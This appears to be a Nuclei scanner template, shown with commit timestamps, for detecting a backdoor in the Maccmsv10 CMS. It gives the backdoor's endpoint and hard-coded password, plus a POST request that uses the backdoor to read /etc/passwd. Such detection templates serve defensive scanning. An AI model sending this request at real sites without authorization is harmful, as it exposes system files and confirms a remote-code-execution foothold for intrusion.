2021-04-09 22:00:22 +00:00
id : maccmsv10-backdoor
2022-04-22 10:38:41 +00:00
2021-04-09 22:00:22 +00:00
info :
2022-05-30 17:11:43 +00:00
name : Maccmsv10 - Backdoor Remote Code Execution
2021-04-09 22:00:22 +00:00
author : princechaddha
severity : critical
2022-05-30 17:11:43 +00:00
description : Maccmsv10 contains a backdoor which can be exploited by remote attackers. The backdoor is accessible via the '/index.php/bbs/index/download' endpoint and the special 'getpwd' parameter value of 'WorldFilledWithLove'. Exploitation of this vulnerability will allow remote attackers to execute code.
2022-05-30 13:48:06 +00:00
reference :
- https://github.com/chaitin/xray/blob/master/pocs/maccmsv10-backdoor.yml
2022-05-30 17:11:43 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score : 10.0
cwe-id : CWE-77
2022-05-31 08:56:02 +00:00
tags : maccmsv10,rce,backdoor
2021-04-09 22:00:22 +00:00
requests :
- method : POST
path :
- "{{BaseURL}}/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1"
body : "getpwd=WorldFilledWithLove"
headers :
Content-Type : application/x-www-form-urlencoded
matchers-condition : and
matchers :
- type : word
2022-05-31 08:56:02 +00:00
part : body
2021-04-09 22:00:22 +00:00
words :
- "扫描后门"
- "反弹端口"
- "文件管理"
condition : and
2022-05-31 08:56:02 +00:00
2021-04-09 22:00:22 +00:00
- type : status
status :
- 200
2022-05-30 13:48:06 +00:00
# Enhanced by mp on 2022/05/30